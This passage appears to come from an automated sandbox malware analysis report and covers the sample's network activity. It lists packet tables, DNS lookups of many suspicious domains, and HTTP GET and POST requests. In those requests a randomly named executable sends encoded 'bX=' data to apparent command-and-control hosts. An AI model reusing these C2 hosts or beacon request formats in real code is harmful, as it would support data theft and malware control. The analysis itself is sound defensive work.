                              Sep 16, 2024 09:32:42.501784086 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501799107 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501812935 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501823902 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501832962 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.501836061 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501847982 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501866102 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.501900911 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.508018017 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508052111 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508063078 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508086920 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.557610989 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.593930006 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593957901 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593976021 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593991041 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594005108 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594027996 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594119072 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594289064 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594333887 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594337940 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594350100 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594362020 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594372034 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594386101 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594422102 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594958067 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.595021009 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.598916054 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.604908943 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:47.703512907 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.709597111 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:47.711637974 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.723521948 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.731129885 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.381959915 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.382134914 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.382184982 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:49.229624987 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.248459101 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.253447056 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.253535032 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.265780926 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.270580053 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.929989100 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.930059910 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.930157900 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:51.776413918 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.796756029 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.801618099 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:52.801686049 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.817351103 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.822293043 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:52.822390079 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.462506056 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.462795019 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.469754934 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:54.323303938 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.345873117 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.353995085 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:55.357655048 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.363876104 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.368844032 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015064955 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015131950 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:56.015666008 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:56.017837048 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:56.022699118 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:33:09.545620918 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.550518990 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:09.550669909 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.561683893 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:09.566481113 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.443836927 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.443970919 CEST805492047.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:10.444044113 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:11.073359013 CEST5492080192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.094676018 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.099654913 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:12.099766016 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.111026049 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:12.115847111 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.022877932 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.022937059 CEST805492147.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:13.023025990 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:13.620279074 CEST5492180192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.641808033 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.646786928 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:14.646883965 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.657780886 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:14.662693024 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:14.662740946 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552326918 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552364111 CEST805492247.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:15.552453995 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:16.167171955 CEST5492280192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.185559034 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.190752029 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:17.190937996 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.199580908 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:17.204432964 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095608950 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095665932 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:18.095886946 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:18.099642992 CEST5492380192.168.2.547.57.185.227
                              Sep 16, 2024 09:33:18.104470015 CEST805492347.57.185.227192.168.2.5
                              Sep 16, 2024 09:33:23.107561111 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.112668037 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.112751961 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.123069048 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:23.127931118 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749639988 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749797106 CEST805492489.58.49.1192.168.2.5
                              Sep 16, 2024 09:33:23.749916077 CEST5492480192.168.2.589.58.49.1
                              Sep 16, 2024 09:33:24.635838985 CEST5492480192.168.2.589.58.49.1

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 16, 2024 09:29:37.926980019 CEST5711953192.168.2.51.1.1.1
                              Sep 16, 2024 09:29:37.944380999 CEST53571191.1.1.1192.168.2.5
                              Sep 16, 2024 09:29:42.952749014 CEST6214953192.168.2.51.1.1.1
                              Sep 16, 2024 09:29:42.965519905 CEST53621491.1.1.1192.168.2.5
                              Sep 16, 2024 09:29:48.143886089 CEST5361495162.159.36.2192.168.2.5
                              Sep 16, 2024 09:29:48.983159065 CEST53511571.1.1.1192.168.2.5
                              Sep 16, 2024 09:29:58.937052011 CEST5714053192.168.2.51.1.1.1
                              Sep 16, 2024 09:29:58.988787889 CEST53571401.1.1.1192.168.2.5
                              Sep 16, 2024 09:30:12.482532024 CEST6190153192.168.2.51.1.1.1
                              Sep 16, 2024 09:30:12.493915081 CEST53619011.1.1.1192.168.2.5
                              Sep 16, 2024 09:30:20.561389923 CEST6508853192.168.2.51.1.1.1
                              Sep 16, 2024 09:30:20.815675020 CEST53650881.1.1.1192.168.2.5
                              Sep 16, 2024 09:30:34.671411037 CEST5944053192.168.2.51.1.1.1
                              Sep 16, 2024 09:30:34.765976906 CEST53594401.1.1.1192.168.2.5
                              Sep 16, 2024 09:30:48.437232018 CEST5077253192.168.2.51.1.1.1
                              Sep 16, 2024 09:30:48.472611904 CEST53507721.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:01.810746908 CEST6140753192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:02.096985102 CEST53614071.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:15.343071938 CEST6377153192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:15.387367010 CEST53637711.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:28.670255899 CEST5798253192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:28.948599100 CEST53579821.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:43.373693943 CEST6413353192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:43.394575119 CEST53641331.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:56.639570951 CEST5057953192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:57.639394045 CEST5057953192.168.2.51.1.1.1
                              Sep 16, 2024 09:31:57.646022081 CEST53505791.1.1.1192.168.2.5
                              Sep 16, 2024 09:31:57.714989901 CEST53505791.1.1.1192.168.2.5
                              Sep 16, 2024 09:32:12.562190056 CEST4969153192.168.2.51.1.1.1
                              Sep 16, 2024 09:32:12.572406054 CEST53496911.1.1.1192.168.2.5
                              Sep 16, 2024 09:32:20.639574051 CEST5604253192.168.2.51.1.1.1
                              Sep 16, 2024 09:32:20.717058897 CEST53560421.1.1.1192.168.2.5
                              Sep 16, 2024 09:32:33.966893911 CEST4962853192.168.2.51.1.1.1
                              Sep 16, 2024 09:32:34.026355982 CEST53496281.1.1.1192.168.2.5
                              Sep 16, 2024 09:32:47.607671976 CEST6064953192.168.2.51.1.1.1
                              Sep 16, 2024 09:32:47.696449995 CEST53606491.1.1.1192.168.2.5
                              Sep 16, 2024 09:33:04.120685101 CEST5564353192.168.2.51.1.1.1
                              Sep 16, 2024 09:33:04.138274908 CEST53556431.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 16, 2024 09:29:37.926980019 CEST192.168.2.51.1.1.10x3326Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:29:42.952749014 CEST192.168.2.51.1.1.10x64dcStandard query (0)www.726075.buzzA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:29:58.937052011 CEST192.168.2.51.1.1.10xa95Standard query (0)www.freepicture.onlineA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:12.482532024 CEST192.168.2.51.1.1.10xb9f9Standard query (0)www.318st.comA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:20.561389923 CEST192.168.2.51.1.1.10xb65eStandard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:34.671411037 CEST192.168.2.51.1.1.10x1932Standard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:48.437232018 CEST192.168.2.51.1.1.10x6069Standard query (0)www.mfgamecompany.shopA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:01.810746908 CEST192.168.2.51.1.1.10x7b2aStandard query (0)www.quilo.lifeA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:15.343071938 CEST192.168.2.51.1.1.10x2aafStandard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:28.670255899 CEST192.168.2.51.1.1.10xea35Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:43.373693943 CEST192.168.2.51.1.1.10xb6aaStandard query (0)www.kckartal.xyzA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:56.639570951 CEST192.168.2.51.1.1.10x340fStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:57.639394045 CEST192.168.2.51.1.1.10x340fStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:12.562190056 CEST192.168.2.51.1.1.10x53c5Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:20.639574051 CEST192.168.2.51.1.1.10x43aStandard query (0)www.capbear.netA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:33.966893911 CEST192.168.2.51.1.1.10xadcStandard query (0)www.groet.onlineA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:47.607671976 CEST192.168.2.51.1.1.10x6e5Standard query (0)www.070001350.xyzA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:33:04.120685101 CEST192.168.2.51.1.1.10x5f2aStandard query (0)www.monos.shopA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 16, 2024 09:29:37.944380999 CEST1.1.1.1192.168.2.50x3326Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:29:42.965519905 CEST1.1.1.1192.168.2.50x64dcNo error (0)www.726075.buzz47.57.185.227A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:29:58.988787889 CEST1.1.1.1192.168.2.50xa95No error (0)www.freepicture.onlinefreepicture.onlineCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:29:58.988787889 CEST1.1.1.1192.168.2.50xa95No error (0)freepicture.online89.58.49.1A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:12.493915081 CEST1.1.1.1192.168.2.50xb9f9Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:20.815675020 CEST1.1.1.1192.168.2.50xb65eNo error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:30:20.815675020 CEST1.1.1.1192.168.2.50xb65eNo error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:34.765976906 CEST1.1.1.1192.168.2.50x1932No error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:30:34.765976906 CEST1.1.1.1192.168.2.50x1932No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:30:34.765976906 CEST1.1.1.1192.168.2.50x1932No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:30:48.472611904 CEST1.1.1.1192.168.2.50x6069No error (0)www.mfgamecompany.shopmfgamecompany.shopCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:30:48.472611904 CEST1.1.1.1192.168.2.50x6069No error (0)mfgamecompany.shop185.173.111.76A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:02.096985102 CEST1.1.1.1192.168.2.50x7b2aNo error (0)www.quilo.life203.161.43.228A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:15.387367010 CEST1.1.1.1192.168.2.50x2aafNo error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:28.948599100 CEST1.1.1.1192.168.2.50xea35No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:31:28.948599100 CEST1.1.1.1192.168.2.50xea35No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:43.394575119 CEST1.1.1.1192.168.2.50xb6aaNo error (0)www.kckartal.xyz104.21.20.125A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:43.394575119 CEST1.1.1.1192.168.2.50xb6aaNo error (0)www.kckartal.xyz172.67.192.227A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:31:57.714989901 CEST1.1.1.1192.168.2.50x340fNo error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:12.572406054 CEST1.1.1.1192.168.2.50x53c5Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:20.717058897 CEST1.1.1.1192.168.2.50x43aNo error (0)www.capbear.net104.207.148.137A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:34.026355982 CEST1.1.1.1192.168.2.50xadcNo error (0)www.groet.online185.104.29.12A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:32:47.696449995 CEST1.1.1.1192.168.2.50x6e5No error (0)www.070001350.xyz070001350.xyzCNAME (Canonical name)IN (0x0001)false
                              Sep 16, 2024 09:32:47.696449995 CEST1.1.1.1192.168.2.50x6e5No error (0)070001350.xyz65.21.196.90A (IP address)IN (0x0001)false
                              Sep 16, 2024 09:33:04.138274908 CEST1.1.1.1192.168.2.50x5f2aName error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • www.726075.buzz
                              • www.freepicture.online
                              • www.hm62t.top
                              • www.golbasi-nakliyat.xyz
                              • www.mfgamecompany.shop
                              • www.quilo.life
                              • www.qiluqiyuan.buzz
                              • www.bola88site.one
                              • www.kckartal.xyz
                              • www.mizuquan.top
                              • www.capbear.net
                              • www.groet.online
                              • www.070001350.xyz

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.54971147.57.185.22780728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:29:42.989041090 CEST461OUTGET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:29:43.875068903 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:29:43 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.55864689.58.49.180728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:29:59.009834051 CEST742OUTPOST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                              Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                              Sep 16, 2024 09:29:59.652570009 CEST360INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:29:59 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.55864789.58.49.180728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:01.563714027 CEST762OUTPOST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 4f 58 52 68 58 4c 54 4c 4b 33 31 4d 47 31 33 68 71 30 74 67 4a 6c 66 46 77 79 49 4c 79 61 4c 68 49 62 76 56 46 64
                              Data Ascii: bX=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKOXRhXLTLK31MG13hq0tgJlfFwyILyaLhIbvVFd
                              Sep 16, 2024 09:30:02.206929922 CEST360INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:02 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
